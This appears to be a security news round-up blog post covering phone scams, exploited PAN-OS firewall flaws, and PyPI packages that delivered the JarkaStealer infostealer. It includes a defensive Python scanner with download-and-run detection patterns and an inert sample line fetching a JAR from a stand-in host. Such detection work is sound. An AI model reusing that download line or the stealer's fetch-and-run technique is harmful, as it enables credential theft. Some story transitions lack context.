Security news weekly round-up – 22nd November 2024





Introduction

Welcome, and I hope that you’re all doing well. This week’s review will be a short one because we have just 3 articles to cover. Why? They are the ones worthy of making it after careful consideration.

The articles are about scams and malware. Although we’re not immune from these two threats, education and awareness keep us one step ahead of threat actors (TAs).

Let’s begin.


If your mobile carrier labels a call as “Scam Likely”, it’s best to heed the warning and ignore the number. Many people have lost money by picking up such calls and, to make it worse, the scammers can record your voice to aid them in future phishing attempts.

Stay safe and read the excerpt below.

While 16% of global consumers reported losing money to phone scams in 2023, the figure is even higher in some countries like Germany (19%) and France (18%). It’s also costing victims in wasted time. Consumers claim they spend nine minutes per week – nearly eight hours each year, screening nuisance calls.

The numbers are worrying, although Palo Alto believes the actual number is less than 2000. Nonetheless, updates are available to patch the vulnerabilities, and if you’re affected, it’s best to update as soon as possible.

Here is an excerpt from the article:

Palo Alto Networks learned about a potential PAN-OS zero-day in early November and confirmed in-the-wild exploitation of a new vulnerability on November 15. On November 18, the security firm announced the release of patches for impacted firewalls and clarified that two vulnerabilities have been exploited in malicious attacks.

At the time of writing, the malicious packages have been removed from PyPI. While they were available for download, the download count was in the thousands. This proves once again that malicious packages or applications can make their way into official sources.

The following is what happened when the packages were used:

Specifically, the “__init__.py” file in these packages contained Base64-encoded data that contained code to download a Java archive file (“JavaUpdater.jar”) from a GitHub repository (“github[.]com/imystorage/storage”). It also downloads the Java Runtime Environment (JRE) from a Dropbox URL if Java is not already installed on the host, before running the JAR file.

The JAR file is a Java-based information stealer called JarkaStealer that can steal a wide range of sensitive information, including web browser data, system data, screenshots, and session tokens from various applications like Telegram, Discord, and Steam.
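As an added illustration (not code from the quoted article or from this round-up), the static check below parses a package's `__init__.py` without executing it and flags string literals that Base64-decode to download-and-run markers like the behaviour described above. The marker list, the length threshold, the function names and the sample input are assumptions constructed for this example.

```python
import ast
import base64
import binascii
import re

B64_CHARS = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MIN_LEN = 40  # assumed threshold: ignore short literals
# Assumed heuristic markers for download-and-run behaviour in decoded data.
MARKERS = re.compile(
    rb"https?://|\.jar\b|urlretrieve|urlopen|subprocess|os\.system|java\s+-jar", re.I)


def try_decode(text):
    """Return decoded bytes if text is a plausible Base64 blob, else None."""
    compact = "".join(text.split())
    if len(compact) < MIN_LEN or not B64_CHARS.fullmatch(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_source(source, filename="__init__.py"):
    """Parse (never execute) source; report literals that decode to markers."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes))):
            continue
        value = node.value
        text = value.decode("ascii", "ignore") if isinstance(value, bytes) else value
        decoded = try_decode(text)
        if decoded is None:
            continue
        hits = sorted({m.group(0).decode().lower() for m in MARKERS.finditer(decoded)})
        if hits:
            findings.append({"file": filename, "line": node.lineno, "markers": hits})
    return findings


# Constructed sample: an inert string standing in for the encoded stage.
_STAGE = b'urlretrieve("https://example.invalid/JavaUpdater.jar", "JavaUpdater.jar")'
SAMPLE_INIT = 'import base64\n_d = "%s"\n' % base64.b64encode(_STAGE).decode()

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_INIT):
        print(finding)
```

Because the check only parses the file, it can be run against an unpacked sdist or wheel before anything is installed; a hit is a reason to review the package by hand, not proof of malice.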



Credits

Cover photo by Debby Hudson on Unsplash.


That’s it for this week, and I’ll see you next time.




By stp2y
